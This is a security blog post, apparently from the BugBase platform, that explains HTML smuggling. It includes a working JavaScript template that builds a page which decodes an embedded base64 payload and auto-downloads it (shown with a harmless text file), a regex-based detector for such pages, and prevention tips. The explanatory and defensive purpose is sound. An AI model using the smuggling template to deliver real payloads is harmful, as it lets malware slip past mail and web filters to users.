Lethal cyber-attack everyone should know about!
HTML smuggling lets an attacker slip a malicious payload past perimeter content filters and firewalls by hiding it inside a seemingly innocent HTML file. The file the victim receives contains no executable: the payload travels as encoded data (typically a base64 string) and is assembled into a real file only after the page runs in the browser, so network inspection sees HTML and JavaScript rather than a binary download.
Two standard web features make this possible: JavaScript Blob objects and the HTML5 download attribute on the anchor (<a>) tag.
What are Anchor tags and JavaScript Blobs?
The anchor tag <a> links one page to another resource: a script, another HTML page, or a downloadable file.
When <a> carries the "download" attribute, following the link saves the target as a file (under the name given by the attribute) instead of navigating to it.
A Blob in JavaScript is an object holding a group of raw bytes, the same bytes that would otherwise live in a file on disk. Blob data is kept in the browser's memory on the client, and a Blob can stand in wherever a real file would be used: URL.createObjectURL() turns it into a blob: URL that can be handed to any API expecting a URL, such as an anchor's href. In other words, Blobs let a page build file-like objects entirely on the client side.
Normally, a server-hosted file such as "payload.exe" is downloaded through a link of the form <a href="payload.exe" download>. With HTML smuggling, the bytes of payload.exe are instead embedded in the page as an encoded string, decoded by JavaScript into a Blob, and the resulting blob: URL is attached to an anchor with the download attribute. The file is assembled and written to disk at the user end, so it never crosses the network as a file.
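The mechanics described above, as an added example that is not code from the original post. It uses a constructed, harmless payload (a plain-text file, base64-encoded and embedded in the page as a string); the names SMUGGLED_B64, FILE_NAME, decodeSmuggledPayload, makeBlobUrl, triggerDownload and buildSmugglingPage are this example's own, and the generated page is the kind of artifact a phishing mail would carry as an .html attachment.

```javascript
// Added example (not from the original post): the client-side half of HTML
// smuggling, with a harmless constructed payload. In a real attack the same
// code drops an .exe/.iso/.js/.lnk file; only the bytes differ.

// Constructed payload: base64 of "Hello from an HTML smuggling demo."
const SMUGGLED_B64 = "SGVsbG8gZnJvbSBhbiBIVE1MIHNtdWdnbGluZyBkZW1vLg==";
const FILE_NAME = "payload.txt"; // assumption for the demo; attackers use executable types

// Step 1: turn the embedded string back into raw bytes, entirely client-side.
// Nothing is fetched from a server, so no download crosses the perimeter.
function decodeSmuggledPayload(b64) {
  const binary = atob(b64); // available in browsers and Node 16+
  const bytes = new Uint8Array(binary.length);
  for (let i = 0; i < binary.length; i++) bytes[i] = binary.charCodeAt(i);
  return bytes;
}

// Step 2: wrap the bytes in a Blob and expose it as a blob: URL.
function makeBlobUrl(bytes, mime = "application/octet-stream") {
  const blob = new Blob([bytes], { type: mime });
  return URL.createObjectURL(blob);
}

// Step 3: point an anchor with the download attribute at the blob: URL and
// click it from script. Returns false when there is no DOM (e.g. under Node).
function triggerDownload(url, fileName) {
  if (typeof document === "undefined") return false;
  const a = document.createElement("a");
  a.href = url;
  a.download = fileName;
  document.body.appendChild(a);
  a.click();
  document.body.removeChild(a);
  URL.revokeObjectURL(url);
  return true;
}

// The complete artifact: one HTML file in which the three steps above run on
// load. On the wire this is plain HTML plus a string literal, not a file download.
function buildSmugglingPage(b64, fileName) {
  return `<!DOCTYPE html>
<html><body>
<p>Loading document, please wait...</p>
<script>
  var b64 = "${b64}";
  var bin = atob(b64);
  var bytes = new Uint8Array(bin.length);
  for (var i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
  var blob = new Blob([bytes], { type: "application/octet-stream" });
  var a = document.createElement("a");
  a.href = URL.createObjectURL(blob);
  a.download = "${fileName}";
  document.body.appendChild(a);
  a.click();
</script>
</body></html>`;
}

// Usage: in a browser this saves payload.txt to disk; under Node it only decodes.
const payloadBytes = decodeSmuggledPayload(SMUGGLED_B64);
if (typeof document !== "undefined") {
  triggerDownload(makeBlobUrl(payloadBytes), FILE_NAME);
}
```

Save the string returned by buildSmugglingPage() as an .html file and open it in a browser to see the drop happen; a proxy or mail gateway that inspects the attachment sees only the base64 literal and the script around it, which is exactly why gateway scanning alone does not stop this technique.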
HTML smuggling code can be embedded in any convincing phishing page to raise the odds that the user runs the dropped file. The smuggled payload need not be an executable: shortcut (.lnk) files, malicious PDFs, and MS Office documents with malicious macros are all possible.
Prevention -
1) Configure endpoint security software to block pages that use JS or VBScript from automatically launching a downloaded executable.
2) Change the default file association for .js files so they open in Notepad rather than being executed or opened in a browser.
3) Email attachments, HTML attachments in particular, must be reviewed carefully and manually by all users before opening. Because the payload is only assembled inside the browser, gateway scanning of the attachment alone is not enough.
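A complement to the manual review in the list above, added here as an example and not part of the original post: a static triage check that flags HTML attachments carrying the building blocks of HTML smuggling. The indicator list, the scanHtmlForSmuggling function and both sample pages are constructed for this example; the heuristic is deliberately simple and will miss obfuscated pages, so treat hits as leads for analysis rather than verdicts.

```javascript
// Added example (not from the original post): static triage of an HTML
// attachment for HTML smuggling indicators. Heuristic only: obfuscation
// (string splitting, eval, custom decoders) defeats it, and legitimate
// "export as file" features can trigger it.

// Building blocks of a smuggling page. A benign page rarely uses more than
// one or two of these together.
const INDICATORS = [
  { name: "base64 decode",          re: /\batob\s*\(/ },
  { name: "Blob construction",      re: /new\s+Blob\s*\(/ },
  { name: "object URL",             re: /URL\.createObjectURL\s*\(/ },
  { name: "legacy IE download API", re: /msSaveOrOpenBlob|msSaveBlob/ },
  { name: "download attribute",     re: /\.download\s*=|\bdownload\s*=\s*["']/ },
  { name: "scripted click",         re: /\.click\s*\(\s*\)/ },
];

// A long, unbroken base64 run in page text is the smuggled payload itself.
const BASE64_LITERAL = /[A-Za-z0-9+\/]{200,}={0,2}/;

// Returns { suspicious, hits }; suspicious when at least minIndicators fire.
function scanHtmlForSmuggling(html, minIndicators = 3) {
  const hits = INDICATORS.filter((ind) => ind.re.test(html)).map((ind) => ind.name);
  const payloadMatch = html.match(BASE64_LITERAL);
  if (payloadMatch) hits.push(`inline base64 literal (${payloadMatch[0].length} chars)`);
  return { suspicious: hits.length >= minIndicators, hits };
}

// Constructed sample 1: a smuggling page. The base64 body is filler
// ("QUJD" repeated), standing in for a real encoded payload.
const SAMPLE_SMUGGLED_HTML = `<html><body>
<script>
  var b64 = "${"QUJD".repeat(60)}";
  var bin = atob(b64);
  var bytes = new Uint8Array(bin.length);
  for (var i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
  var blob = new Blob([bytes], { type: "application/octet-stream" });
  var a = document.createElement("a");
  a.href = URL.createObjectURL(blob);
  a.download = "invoice.exe";
  a.click();
</script>
</body></html>`;

// Constructed sample 2: an ordinary page with a normal link and a little script.
const SAMPLE_BENIGN_HTML = `<html><body>
<h1>Quarterly report</h1>
<p>Open the <a href="https://example.com/report">report</a> on the portal.</p>
<script>document.title = "Quarterly report";</script>
</body></html>`;

// Usage: run both samples through the scanner.
const smuggledVerdict = scanHtmlForSmuggling(SAMPLE_SMUGGLED_HTML);
const benignVerdict = scanHtmlForSmuggling(SAMPLE_BENIGN_HTML);
console.log("smuggled sample:", smuggledVerdict);
console.log("benign sample:", benignVerdict);
```

Run it on the .html attachments a mail gateway quarantines or on files pulled from a user's Downloads folder during an investigation; a page scoring several indicators plus a large base64 literal is worth detonating in a sandbox to recover the dropped file.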
What is BugBase?
BugBase is a curated marketplace for ethical hackers that helps businesses and startups set up bug bounty programs. It is India's first consolidated bug bounty platform, which assists organizations in staying safe by providing an all-in-one platform for continuous and comprehensive security testing.
Through BugBase, registering and setting up your organisation's bug bounty program is no less than a breeze. We also give hackers and security professionals a platform to connect directly with organizations that have set up bug bounty programs and to get rewarded for the risks and vulnerabilities they find.
Thank you for being part of our BugFam! Stay up to date on our latest posts, and we hope you had a great week!
Join our Discord community for regular updates and much more fun!
Cheers,
BugBase Team